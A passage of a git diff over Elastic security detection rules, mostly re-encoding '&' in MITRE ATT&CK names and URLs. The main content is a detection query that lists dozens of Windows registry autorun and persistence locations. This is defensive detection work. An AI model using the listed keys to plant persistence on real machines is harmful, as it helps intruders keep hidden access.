registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json index 8e17f606dd3..7e05b1386de 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json @@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json index ff0624c4416..8ad079a44d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_2.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json index b1056759273..8bf6c1a5c4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_3.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json index 043c4241e56..f09d395ef5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json index dd1aa28aaa0..97f608fffd8 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json index cec534bf993..f738725e48b 100644 --- a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_6.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json index 1263e52c267..f945e19959c 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json index a0c8319ec95..c2340eb08e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json index 2487ff310c0..2d996eb19ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json index 16e29ea9afa..86e476fab9a 100644 --- a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_106.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": 